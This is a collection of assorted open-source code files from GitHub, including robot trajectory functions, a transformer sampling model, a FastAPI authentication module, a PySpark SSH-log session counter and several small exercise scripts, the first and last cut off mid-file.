(2*np.pi)/period\n delta_time = (time-initial_time)\n \n # Position calculation\n pos_x = center_px + radius * np.cos(sign*rate*delta_time)\n pos_y = center_py + radius * np.sin(sign*rate*delta_time)\n \n # velocity calculation\n vel_x = center_vx - sign*rate*radius*np.sin(sign*rate * delta_time)\n vel_y = center_vy + sign*rate*radius*np.cos(sign*rate * delta_time)\n \n return pos_x, pos_y, vel_x, vel_y\n \n\ndef swarm_circle(f1=1, f2=1, R1=0.4, R2=0.9, P=30, dt=0.1):\n gcd = np.gcd(f1,f2)\n end_time = gcd*P\n \n time_set=np.arange(0, end_time, dt)\n \n pos1x, pos1y, dir1x, dir1y = circle_around_point([0,0], [0,0], time_set, R1, P/f1, sign=-1)\n pos2x, pos2y, dir2x, dir2y = circle_around_point([pos1x, pos1y], [dir1x, dir1y], time_set, R2, P/f2, sign=-1)\n \n relx, rely = pos1x - pos2x, pos1y - pos2y\n dir2_to_1 = (np.arctan2(relx, rely))\n\n dir_robot_1 = (np.arctan2(-relx, -rely))\n \n set_1 = [time_set, pos1x, pos1y, dir_robot_1]\n set_2 = [time_set, pos2x, pos2y, dir2_to_1]\n \n return set_1, set_2\n\n\ndef calibrate_directions(size = 0.6, seq_time=2, dt=0.1):\n \n seq_dir = [0*np.pi, 0.5*np.pi, 1.0*np.pi, 1.5*np.pi]\n N = len(seq_dir)\n time_set = np.arange(0,2*seq_time*N,dt)\n \n x_pos = np.zeros(len(time_set))\n y_pos = np.zeros(len(time_set))\n a_set = np.zeros(len(time_set))\n \n for i, dir in enumerate(seq_dir):\n seq_start_time = i*2*seq_time\n seq_half_time = i*2*seq_time + seq_time\n seq_end_time = (i+1)*2*seq_time\n \n progress_out = np.linspace(0,1,int(seq_time/dt))\n progress_back = np.linspace(1,0,int(seq_time/dt))\n\n x_pos[int(seq_start_time/dt):int(seq_half_time/dt)] = size * np.cos(dir) * smooth_progress(progress_out)\n y_pos[int(seq_start_time/dt):int(seq_half_time/dt)] = size * np.sin(dir) * smooth_progress(progress_out)\n \n x_pos[int(seq_half_time/dt):int(seq_end_time/dt)] = size * np.cos(dir) * smooth_progress(progress_back)\n y_pos[int(seq_half_time/dt):int(seq_end_time/dt)] = size * np.sin(dir) * smooth_progress(progress_back)\n \n return [time_set, x_pos, y_pos, a_set], [time_set, x_pos, y_pos, a_set]\n \ndef smooth_progress(linear_progress):\n return .5*np.sin(linear_progress*np.pi - np.pi/2) + .5\n\ndef circle_motion(T=6.0, R=0.25, dt=0.1, sign=1):\n \n time_set = np.arange(0,T,dt)\n x_pos = R*np.cos(sign*time_set * 2*np.pi/T)\n y_pos = R*np.sin(sign*time_set * 2*np.pi/T)\n a_set = np.arange(0, 2*np.pi, 2*np.pi/len(time_set))\n \n return time_set, x_pos, y_pos, a_set\n \n\n\ndef main():\n #calibrate_directions()\n \n x = np.linspace(0,1,50)\n y = smooth_progress(x)\n 
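    # smooth_progress() is a sine ease-in-out on [0, 1]; its fixed points are
    # easy to verify: smooth_progress(np.array([0.0, 0.5, 1.0])) gives
    # [0.0, 0.5, 1.0].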
plt.plot(x,y)\n plt.show()\n \n \n\nif __name__ == \"__main__\":\n main()\n \n \n \n ","repo_name":"lucas-cohen/DSS-ground-testbench","sub_path":"control/default_dynamics.py","file_name":"default_dynamics.py","file_ext":"py","file_size_in_byte":5609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28791100571","text":"# def threeNumberSum(array, targetSum):\n# array.sort()\n# res = []\n \n# for i in range(len(array)):\n# twoSum(array, i, res, targetSum)\n# return res\n\n# def twoSum(array, i, res, targetSum):\n# l, r = i + 1, len(array) - 1\n\n# while l < r:\n# if array[i] + array[l] + array[r] < targetSum:\n# l += 1\n# elif array[i] + array[l] + array[r] > targetSum:\n# r -= 1\n# else:\n# res.append([array[i], array[l], array[r]])\n# l += 1\n# return res\n\n# def threeNumberSum(array, targetSum):\n# foundTriplets = []\n# itemMap = {}\n# array.sort()\n\n# for i in array:\n# itemMap[i] = True\n\n# for i in array:\n# for j in array:\n# if i != j:\n# targetSumDelta = targetSum - (i + j)\n# if targetSum != i and targetSumDelta != j and targetSumDelta in itemMap:\n# hit = [i, j, targetSumDelta]\n# hit.sort()\n# if not hit in foundTriplets:\n# foundTriplets.append(hit)\n\n# return foundTriplets\n\ndef threeNumberSum(array, targetSum):\n lst = []\n for num1 in array:\n for num2 in array[array.index(num1) + 1:]:\n if (targetSum - num1 - num2) in array[array.index(num2) + 1:]:\n lst.append(sorted([num1, num2, targetSum - num1 - num2]))\n return sorted(lst)","repo_name":"rep-pierce/python_files","sub_path":"three_number_sum.py","file_name":"three_number_sum.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28456052902","text":"from .layers.transformer import *\nfrom .layers.improved_transformer import *\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport pdb \n\n\nSAMPLE_PROB = 0.99 \n\n\ndef top_k_top_p_filtering(logits, top_k=0, top_p=0.0, filter_value=-float('Inf')):\n \"\"\" Filter a distribution of logits using top-k and/or nucleus (top-p) filtering\n Args:\n logits: logits distribution shape (vocabulary size)\n top_k >0: keep only top k tokens with highest probability (top-k filtering).\n top_p >0.0: keep the top tokens with cumulative probability >= top_p (nucleus filtering).\n Nucleus filtering is described in Holtzman et al. 
(http://arxiv.org/abs/1904.09751)\n \"\"\"\n assert logits.dim() == 1 # batch size 1 for now - could be updated for more but the code would be less clear\n top_k = min(top_k, logits.size(-1)) # Safety check\n if top_k > 0:\n # Remove all tokens with a probability less than the last token of the top-k\n indices_to_remove = logits < torch.topk(logits, top_k)[0][..., -1, None]\n logits[indices_to_remove] = filter_value\n\n if top_p > 0.0:\n sorted_logits, sorted_indices = torch.sort(logits, descending=True)\n cumulative_probs = torch.cumsum(F.softmax(sorted_logits, dim=-1), dim=-1)\n\n # Remove tokens with cumulative probability above the threshold\n sorted_indices_to_remove = cumulative_probs > top_p\n # Shift the indices to the right to keep also the first token above the threshold\n sorted_indices_to_remove[..., 1:] = sorted_indices_to_remove[..., :-1].clone()\n sorted_indices_to_remove[..., 0] = 0\n\n indices_to_remove = sorted_indices[sorted_indices_to_remove]\n logits[indices_to_remove] = filter_value\n return logits\n\n\nclass Embedder(nn.Module):\n def __init__(self, vocab_size, d_model):\n super().__init__()\n self.embed = nn.Embedding(vocab_size, d_model)\n def forward(self, x):\n return self.embed(x)\n\n\nclass PositionalEncoding(nn.Module):\n\n def __init__(self, d_model, dropout=0.1, max_len=250):\n super(PositionalEncoding, self).__init__()\n self.dropout = nn.Dropout(p=dropout)\n position = torch.arange(0, max_len, dtype=torch.long).unsqueeze(1)\n self.register_buffer('position', position)\n self.pos_embed = nn.Embedding(max_len, d_model)\n self._init_embeddings()\n\n def _init_embeddings(self):\n nn.init.kaiming_normal_(self.pos_embed.weight, mode=\"fan_in\")\n\n def forward(self, x):\n pos = self.position[:x.size(0)]\n x = x + self.pos_embed(pos)\n return self.dropout(x)\n\n\nclass CodeModel(nn.Module):\n\n def __init__(self,\n config,\n max_len=8,\n classes = 512,\n name='ar_model'):\n super(CodeModel, self).__init__()\n self.embed_dim = config['embed_dim']\n self.max_len = max_len\n self.dropout = config['dropout_rate']\n\n # Position embeddings\n self.pos_embed = PositionalEncoding(max_len=self.max_len, d_model=self.embed_dim)\n \n # Discrete vertex value embeddings\n self.embed = Embedder(classes, self.embed_dim)\n \n # Transformer decoder\n decoder_layers = TransformerDecoderLayerImproved(d_model=self.embed_dim, \n dim_feedforward= config['hidden_dim'],\n nhead=config['num_heads'], dropout=self.dropout)\n decoder_norm = LayerNorm(self.embed_dim)\n self.decoder = TransformerDecoder(decoder_layers, config['num_layers'], decoder_norm)\n self.fc = nn.Linear(self.embed_dim, classes)\n \n\n def forward(self, code):\n \"\"\" forward pass \"\"\"\n if code[0] is None:\n bs = len(code)\n seq_len = 0\n else:\n bs, seq_len = code.shape[0], code.shape[1]\n\n # Context embedding values\n context_embedding = torch.zeros((bs, 1, self.embed_dim)).cuda() # [bs, 1, dim]\n \n if seq_len > 0:\n embeddings = self.embed(code.flatten()).view(bs, code.shape[1], self.embed_dim) # [bs, seqlen, dim]\n decoder_inputs = torch.cat([context_embedding, embeddings], axis=1) # [bs, seqlen+1, dim]\n # Positional embedding\n decoder_inputs = self.pos_embed(decoder_inputs.transpose(0,1)) # [seqlen+1, bs, dim]\n \n else:\n decoder_inputs = self.pos_embed(context_embedding.transpose(0,1)) # [1, bs, dim]\n \n memory = torch.zeros((1, bs, self.embed_dim)).cuda()\n nopeak_mask = torch.nn.Transformer.generate_square_subsequent_mask(decoder_inputs.shape[0]).cuda() # masked with -inf\n decoder_outputs = 
self.decoder(tgt=decoder_inputs, memory=memory, memory_key_padding_mask=None,\n tgt_mask=nopeak_mask, tgt_key_padding_mask=None)\n \n # Get logits \n logits = self.fc(decoder_outputs)\n return logits.transpose(0,1)\n \n\n def sample(self, n_samples=10):\n \"\"\"\n sample from distribution (top-k, top-p)\n \"\"\"\n #samples = []\n temperature = 1.0\n top_k = 0\n top_p = SAMPLE_PROB\n\n for k in range(self.max_len):\n if k == 0:\n v_seq = [None] * n_samples\n \n # pass through decoder\n with torch.no_grad():\n logits = self.forward(code=v_seq)\n logits = logits[:, -1, :] / temperature\n \n # Top-p sampling \n next_vs = []\n for logit in logits: \n filtered_logits = top_k_top_p_filtering(logit.clone(), top_k=top_k, top_p=top_p)\n next_v = torch.multinomial(F.softmax(filtered_logits, dim=-1), 1)\n next_vs.append(next_v.item())\n\n # Add next tokens\n next_seq = torch.LongTensor(next_vs).view(len(next_vs), 1).cuda()\n if v_seq[0] is None:\n v_seq = next_seq\n else:\n v_seq = torch.cat([v_seq, next_seq], 1)\n \n return v_seq\n\n\n\nclass CondARModel(nn.Module):\n \"\"\"Autoregressive generative model of quantized mesh vertices.\"\"\"\n\n def __init__(self,\n config,\n max_len=8,\n classes = 512,\n name='ar_model'):\n super(CondARModel, self).__init__()\n\n self.embed_dim = config['embed_dim']\n self.max_len = max_len\n self.dropout = config['dropout_rate']\n\n # Position embeddings\n self.pos_embed = PositionalEncoding(max_len=self.max_len, d_model=self.embed_dim)\n \n # Discrete vertex value embeddings\n self.code_embed = Embedder(classes, self.embed_dim)\n self.cond_embed = Embedder(classes, self.embed_dim)\n \n # Transformer decoder\n decoder_layers = TransformerDecoderLayerImproved(d_model=self.embed_dim, \n dim_feedforward= config['hidden_dim'],\n nhead=config['num_heads'], dropout=self.dropout)\n decoder_norm = LayerNorm(self.embed_dim)\n self.decoder = TransformerDecoder(decoder_layers, config['num_layers'], decoder_norm)\n self.fc = nn.Linear(self.embed_dim, classes)\n \n\n def forward(self, code, cond):\n \"\"\" forward pass \"\"\"\n if code[0] is None:\n bs = len(code)\n seq_len = 0\n else:\n bs, seq_len = code.shape[0], code.shape[1]\n\n # Context embedding\n context_embedding = torch.zeros((bs, 1, self.embed_dim)).cuda() # [bs, 1, dim]\n \n # Code seq embedding \n if seq_len > 0:\n embeddings = self.code_embed(code.flatten()).view(bs, code.shape[1], self.embed_dim) # [bs, seqlen, dim]\n decoder_inputs = torch.cat([context_embedding, embeddings], axis=1) # [bs, seqlen+1, dim]\n # Positional embedding\n decoder_inputs = self.pos_embed(decoder_inputs.transpose(0,1)) # [seqlen+1, bs, dim]\n else:\n decoder_inputs = self.pos_embed(context_embedding.transpose(0,1)) # [1, bs, dim]\n\n # Cond input embedding \n cond_input = self.cond_embed(cond.flatten()).view(bs, cond.shape[1], self.embed_dim) # [bs, seqlen, dim]\n \n # Pass through AR decoder\n memory = cond_input.transpose(0,1)\n nopeak_mask = torch.nn.Transformer.generate_square_subsequent_mask(decoder_inputs.shape[0]).cuda() # masked with -inf\n decoder_outputs = self.decoder(tgt=decoder_inputs, memory=memory, tgt_mask=nopeak_mask)\n \n # Get logits \n logits = self.fc(decoder_outputs)\n return logits.transpose(0,1)\n\n\n def sample(self, n_samples, cond_code):\n \"\"\"\n sample from distribution (top-k, top-p)\n \"\"\"\n temperature = 1.0\n top_k = 0\n top_p = SAMPLE_PROB\n\n for k in range(self.max_len):\n if k == 0:\n v_seq = [None] * n_samples\n \n # pass through decoder\n with torch.no_grad():\n logits = self.forward(code=v_seq, 
cond=cond_code)\n            logits = logits[:, -1, :] / temperature\n            \n            # Top-p sampling \n            next_vs = []\n            for logit in logits: \n                filtered_logits = top_k_top_p_filtering(logit.clone(), top_k=top_k, top_p=top_p)\n                next_v = torch.multinomial(F.softmax(filtered_logits, dim=-1), 1)\n                next_vs.append(next_v.item())\n\n            # Add next tokens\n            next_seq = torch.LongTensor(next_vs).view(len(next_vs), 1).cuda()\n            if v_seq[0] is None:\n                v_seq = next_seq\n            else:\n                v_seq = torch.cat([v_seq, next_seq], 1)\n        \n        return v_seq\n","repo_name":"samxuxiang/SkexGen","sub_path":"model/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":9167,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"37"}
+{"seq_id":"37460394752","text":"# -*- coding=utf-8 -*-\n# @Time : 2023/01/23 20:25\n# @Author : ╰☆H.俠ゞ\n# =============================================================\nfrom MStudent.autoTest_banXia.todo_dev.students import Stu\n\n\nclass FileOp:\n\n    def __init__(self):\n        self.file = r'/autoTest_banXia/todo_dev\\data.txt'\n\n    # read\n    def read(self):  # per the business requirements, build the intermediate data as a dict: stu_dict = {id: stu}\n        stu_dict = {}\n        with open(self.file, mode='r', encoding='utf-8') as f:\n            # print(f.readlines())\n            for readline in f.readlines():\n                line_split = readline.split(\",\")\n                id = line_split[0]\n                name = line_split[1]\n                phone = line_split[2]\n                qq = line_split[3]\n                score = line_split[4].strip()  # strip() removes leading/trailing whitespace and newlines by default\n                stu = Stu(id, name, phone, qq, score)\n                stu_dict[id] = stu\n        return stu_dict\n\n    # write\n    def write(self, stu_dict: dict):\n        with open(self.file, mode='w', encoding='utf-8') as f:  # mode = 'w' overwrites the file\n            for stu in stu_dict.values():\n                f.write(str(stu))  # force conversion to string: turn the Stu instance into a str instance\n                f.write('\\n')\n\n\nif __name__ == '__main__':\n    print(FileOp().read())","repo_name":"superlff888/projectScripts","sub_path":"MStudent/autoTest_banXia/todo_dev/file_test.py","file_name":"file_test.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"13915432847","text":"\"\"\"\n     ____  ____      _    __  __  ____ ___\n    |  _ \\|  _ \\    / \\  |  \\/  |/ ___/ _ \\\n    | | | | |_) |  / _ \\ | |\\/| | |   | | | |\n    | |_| |  _ <  / ___ \\| |  | | |__| |_| |\n    |____/|_| \\_\\/_/   \\_\\_|  |_|\\____\\___/\n                           research group\n                             dramco.be/\n\n     KU Leuven - Technology Campus Gent,\n     Gebroeders De Smetstraat 1,\n     B-9000 Gent, Belgium\n\n     File: plt_heatmap.py\n     Created: 2018-10-30\n     Author: Gilles Callebaut\n     Description:\n\"\"\"\n\nimport os\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom matplotlib.ticker import ScalarFormatter, FormatStrFormatter\nimport numpy as np\nimport pandas as pd\nfrom scipy import stats\nimport seaborn as sns\n\nfrom math import sqrt\nSPINE_COLOR = 'gray'\n\nimport util as util\n\n\ndef latexify(fig_width=None, fig_height=None, columns=1):\n    \"\"\"Set up matplotlib's RC params for LaTeX plotting.\n    Call this before plotting a figure.\n\n    Parameters\n    ----------\n    fig_width : float, optional, inches\n    fig_height : float, optional, inches\n    columns : {1, 2}\n    \"\"\"\n\n    # code adapted from http://www.scipy.org/Cookbook/Matplotlib/LaTeX_Examples\n\n    # Width and max height in inches for IEEE journals taken from\n    # computer.org/cms/Computer.org/Journal%20templates/transactions_art_guide.pdf\n\n    assert(columns in [1, 2])\n\n    if fig_width is None:\n        fig_width = 2.7 if columns == 1 else 6.9  # width in inches\n\n    if fig_height is None:\n        golden_mean = (sqrt(5)-1.0)/2.0    # Aesthetic ratio\n        
fig_height = fig_width*golden_mean # height in inches\n\n    MAX_HEIGHT_INCHES = 8.0\n    if fig_height > MAX_HEIGHT_INCHES:\n        print(\"WARNING: fig_height too large: \" + str(fig_height) +\n              \", so will reduce to \" + str(MAX_HEIGHT_INCHES) + \" inches.\")\n        fig_height = MAX_HEIGHT_INCHES\n\n    params = {\n        # 'backend': 'ps',\n\n        'axes.labelsize': 8,\n        'axes.titlesize': 8,\n        'legend.fontsize': 8,  # was 10\n        'xtick.labelsize': 8,\n        'ytick.labelsize': 8,\n        # 'text.usetex': True,\n        # \"pgf.rcfonts\": False,\n        # \"pgf.texsystem\": \"pdflatex\",\n        'figure.figsize': [fig_width, fig_height],\n        'font.family': 'serif'\n    }\n\n    mpl.rcParams.update(params)\n\n\ndef format_axes(ax):\n\n    for spine in ['top', 'right']:\n        ax.spines[spine].set_visible(False)\n\n    for spine in ['left', 'bottom']:\n        ax.spines[spine].set_color(SPINE_COLOR)\n        ax.spines[spine].set_linewidth(0.5)\n\n    ax.xaxis.set_ticks_position('bottom')\n    ax.yaxis.set_ticks_position('left')\n\n    for axis in [ax.xaxis, ax.yaxis]:\n        axis.set_tick_params(direction='out', color=SPINE_COLOR)\n\n    return ax\n\n\nlatexify()\n\n\ncurrentDir = os.path.dirname(os.path.abspath(__file__))\ninput_path = os.path.abspath(os.path.join(\n    currentDir, '..', 'result'))\ninput_file = \"preprocessed_data.pkl\"\ninput_file_path = os.path.join(input_path, input_file)\n\n# output_fig_pdf = os.path.join(\n#     input_path, 'path_loss_model.pdf'.format(time_string_file))\n# output_fig_pgf = os.path.join(\n#     input_path, 'path_loss_model.pgf'.format(time_string_file))\n\ndf = pd.read_pickle(input_file_path)\ndf = util.onlyPackets(df)\n\nsns.distplot(df.rss, kde=False, rug=True);\n\nplt.show()\n\n","repo_name":"DRAMCO/LoRaCoverageMeasurements","sub_path":"processing/plot_histogram_rss.py","file_name":"plot_histogram_rss.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"30805138537","text":"import random\r\nwhile True:\r\n    a = int(input(\"how many games: \"))\r\n    if a == 0:\r\n        quit()\r\n    for y in range(1, a+1):\r\n        print(\"game\", y, \":\")\r\n        num = \" \"\r\n        for b in range(1, 15):\r\n            c = random.randint(0, 25)\r\n            num = num + \" \" + str(c)\r\n        print(num)\r\n        \r\n","repo_name":"DaviAstorino/linuxpython","sub_path":"mega.py","file_name":"mega.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"30680499915","text":"from sqlalchemy.orm import Session\nfrom fastapi import Depends, HTTPException, status\nfrom fastapi.security import OAuth2PasswordBearer\nfrom jose import JWTError\n\nfrom app import models\n\nfrom .security import AccessToken, get_user\nfrom .db import SessionLocal\n\n\noauth2_scheme = OAuth2PasswordBearer(tokenUrl=\"/api/auth/token\")\npermission_exception = HTTPException(\n    status_code=status.HTTP_401_UNAUTHORIZED,\n    detail=\"User does not have sufficient permissions\",\n)\n\n\ndef get_db():\n    db = SessionLocal()\n    try:\n        yield db\n    finally:\n        db.close()\n\n\nasync def get_current_user(\n    token: str = Depends(oauth2_scheme), db: Session = Depends(get_db)\n) -> models.User:\n    \"\"\"Dependency to obtain the currently authenticated user.\n    If no authentication is present, a 401 will be returned.\n    \"\"\"\n    credentials_exception = HTTPException(\n        status_code=status.HTTP_401_UNAUTHORIZED,\n        detail=\"Could not validate credentials\",\n        headers={\"WWW-Authenticate\": \"Bearer\"},\n    )\n    try:\n        payload = AccessToken.decode(token)\n        username: str = payload.get(\"sub\")\n        if username is None:\n            raise 
credentials_exception\n\n except JWTError as e:\n raise credentials_exception from e\n\n user = get_user(db, username=username)\n if user is None:\n raise credentials_exception\n return user\n\n\nasync def current_user_is_manager(\n user: models.User = Depends(get_current_user),\n) -> models.User:\n if user.is_manager:\n return user\n else:\n raise permission_exception\n\n\nasync def current_user_is_sponsor(\n user: models.User = Depends(get_current_user),\n) -> models.User:\n if user.is_sponsor or user.is_manager:\n return user\n else:\n raise permission_exception\n\n\nasync def current_user_is_drinkmeister(\n user: models.User = Depends(get_current_user),\n) -> models.User:\n if user.is_drink_meister or user.is_manager:\n return user\n else:\n raise permission_exception","repo_name":"3450-Group-3/PuttPuttGolf","sub_path":"app/dependancies.py","file_name":"dependancies.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17383916159","text":"# import required libraries\r\nimport random\r\n\r\n# define bot's responses\r\nresponses = {\r\n \"hi\": [\"Hello!\", \"Hi there!\", \"Hi! How can I assist you?\"],\r\n \"bye\": [\"Goodbye!\", \"See you later!\", \"Bye! Have a great day.\"],\r\n \"default\": [\"I'm sorry, I didn't understand what you meant. Can you please rephrase?\", \r\n \"I'm not sure what you mean. Could you please provide more context?\"]\r\n}\r\n\r\n# define function to generate bot's response\r\ndef get_bot_response(user_message):\r\n if user_message in responses:\r\n return random.choice(responses[user_message])\r\n else:\r\n return random.choice(responses[\"default\"])\r\n\r\n# start chatting with the bot\r\nwhile True:\r\n user_message = input(\"You: \")\r\n if user_message.lower() == \"quit\":\r\n break\r\n bot_response = get_bot_response(user_message.lower())\r\n print(\"Bot: \" + bot_response)","repo_name":"YashM0304/AI-Practicals","sub_path":"chatbot.py","file_name":"chatbot.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"6873198361","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def tree2str(self, root: Optional[TreeNode]) -> str:\n \n def construct(node):\n if not node: return \"\"\n lr=\"\"\n if node.left and node.right:\n lr=\"(\"+construct(node.left)+\")\"+\"(\"+construct(node.right)+\")\"\n if node.left and not node.right:\n lr=\"(\"+construct(node.left)+\")\"\n if not node.left and node.right:\n lr=\"()\"+\"(\"+construct(node.right)+\")\"\n return str(node.val)+lr\n \n return construct(root)\n ","repo_name":"akkinasrikar/leetcode-problems","sub_path":"606-construct-string-from-binary-tree/606-construct-string-from-binary-tree.py","file_name":"606-construct-string-from-binary-tree.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16465041750","text":"from pyspark import SparkContext, SparkConf\nfrom datetime import date, timedelta\n\nconf = SparkConf().setAppName(\"session_count\").setMaster(\"local[2]\")\nconf.set(\"spark.broadcast.compress\", \"false\")\nconf.set(\"spark.shuffle.compress\", \"false\")\nconf.set(\"spark.shuffle.spill.compress\", \"false\")\nsc = SparkContext(conf=conf)\n# No. 
of unique users using labs in a day, week & month.\n# u'Jul 29 03:32:28 gw02 sshd[13697]: pam_unix(sshd:session): session opened for user yuvankishore6 by (uid=0)'\n\nmonths = [\"Jan\", \"Feb\", \"Mar\", \"Apr\", \"May\", \"Jun\", \"Jul\", \"Aug\", \"Sep\", \"Oct\", \"Nov\", \"Dec\"] # .index()\n# monInNumber = input()\nmonInNumber = 7\ndayOfMonth = 29\n\n\n# this will extract the dates in a given week (1 - 52)\ndef extract_dates(year, week):\n    dates = []\n    dt = date(year, 1, 1)\n    if dt.weekday() > 3:\n        dt = dt + timedelta(7 - dt.weekday())\n    else:\n        dt = dt - timedelta(dt.weekday())\n    dlt = timedelta(days=(week - 1) * 7)\n    for i in range(0, 7):\n        Date = dt + dlt + timedelta(days=i)\n        dates.append(str(Date))\n    return dates\n\n# extracting 30th week of the year 2018\nfulldateList = extract_dates(2018, 30)\n# extracting date and month into separate list\ndateList = []\nmonthList = []\nfor i in range(0, len(fulldateList)):\n    dateList.append(fulldateList[i][8:])\n    x = int(fulldateList[i][5:7])\n    if months[x - 1] not in monthList:\n        monthList.append(months[x - 1])\n\nsecureLog = sc.textFile(\"c:\\\\data\\\\secureMixed2.log\").persist() # 1018875\n# filtering ssh logs\nsshdFilter = secureLog.filter(lambda sl: (str(sl.split(\" \")[4])[:4] == \"sshd\")) # 1018875\n# filtering opened session logs from previous rdd\nopenedFilter = sshdFilter.filter(lambda ocf: str(ocf.split(\" \")[7]).lower() == \"opened\") # 4899\n# -------------------------------------------------\n# no of unique users using lab in a day\n# filtering logs by date of a month\nopenedDayByFilter = openedFilter.filter(\n    lambda odbf: (odbf.split(\" \")[0] == months[monInNumber - 1]) and (odbf.split(\" \")[1] == str(dayOfMonth))) # 163\n# extracting unique user names from previous rdd (use map, not mapPartitions: the lambda receives one log line)\nuniqueUsersListByDay = openedDayByFilter.map(lambda uulbd: uulbd.split(\" \")[10]).distinct() # 39\n# -------------------------------------------------\n# no of unique users using lab in a month\n# filtering logs by month\nopenedMonthByFilter = openedFilter.filter(lambda ombf: ombf.split(\" \")[0] == months[monInNumber - 1]) # 4899\n# extracting unique user names from previous rdd (was openedDayByFilter, which only covered a single day)\nuniqueUsersListByMonth = openedMonthByFilter.map(lambda uulbm: (uulbm.split(\" \")[10])).distinct()\n# -------------------------------------------------\n# no of unique users using lab in a week\n# filtering logs by dates of the given week\nopenedWeekByFilter = openedFilter.filter(\n    lambda owbf: (owbf.split(\" \")[0] in monthList and owbf.split(\" \")[1] in dateList)) # 1625\n# extracting unique user names from previous rdd\nuniqueUsersListByWeek = openedWeekByFilter.map(lambda uulbw: (uulbw.split(\" \")[10])).distinct() # 120\n","repo_name":"vimalathi/pySpark","sub_path":"syslogAnalysis/src/main/totalSessionCount.py","file_name":"totalSessionCount.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"239252174","text":"import re\n\n\ndef LCSBackTrack(v, w):\n    # Initialize the matrices.\n    n = len(v)\n    m = len(w)\n    # score matrix\n    s = []\n    for i in range(n + 1):\n        s.append([])\n        for j in range(m + 1):\n            s[i].append(0)\n    # backtrack direction matrix\n    Backtrack = []\n    for i in range(n):\n        Backtrack.append([])\n        for j in range(m):\n            Backtrack[i].append(\"\")\n\n\n    #print(s)\n    #print(Backtrack)\n\n# fill in scores and directions\n    for i in range(1, n+1):\n        for j in range(1, m+1):\n            if v[i-1] == w[j-1]:\n                s[i][j] = s[i-1][j-1]+1\n\n            else:\n                shu = s[i-1][j]-1  # vertical move\n                heng = s[i][j-1]-1  # horizontal move\n                mismatch = s[i-1][j-1]-1\n                s[i][j] = 
max(heng,shu,mismatch)\n\n\n\n\n            if s[i][j] == s[i-1][j]-1:\n                Backtrack[i-1][j-1] = \"↓\"\n\n            elif s[i][j] == s[i][j-1]-1:\n                Backtrack[i-1][j-1] = \"→\"\n\n            elif s[i][j] == s[i-1][j-1]-1 or s[i][j] == s[i - 1][j - 1]+1:\n                Backtrack[i - 1][j - 1] = \"↘\"\n\n\n\n# get the maximum value in the last column, and the earliest row where it appears\n    i = max(enumerate( [s[row][m] for row in range(m, n+1)] ), key=lambda x: x[1])[0]+ m  # add m because the scan starts at row m, while enumerate counts from 0.\n    max_score = str(s[i][m])\n\n\n    print(s)\n    print(max_score,i)\n    print(Backtrack)\n    return Backtrack,i,m\n\n\n# Backtrack to start of the fitting alignment.\n\n# ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\ndef OutputLCS(backtrack,v,w,i,j):\n    insert_indel = lambda word, i: word[:i] + '-' + word[i:]\n\n    #LCS_V=''\n    #LCS_W=''\n    #print(v,w,i,j)\n    #global s\n    #print(v,w,i,j)\n    #print(backtrack)\n\n    while i*j>0:\n        print(i,j)\n        print(backtrack[i][j])\n        if backtrack[i][j] == \"↓\":\n            i -= 1\n            w = insert_indel(w, j+1)\n\n\n        elif backtrack[i][j] == \"→\":\n            j -= 1\n            v = insert_indel(v, i+1)\n\n        elif backtrack[i][j] == \"↘\":\n            i-=1\n            j-=1\n\n    print(i,j)\n    print(w)\n    print(v)\n    print(i,j)\n    return v[i:],w\n\n\n\n\n\nV= input(\"what is the v string:\")  # two nucleotide strings v and w, where v has length at most 1000 and w has length at most 100.\nW= input(\"what is the w 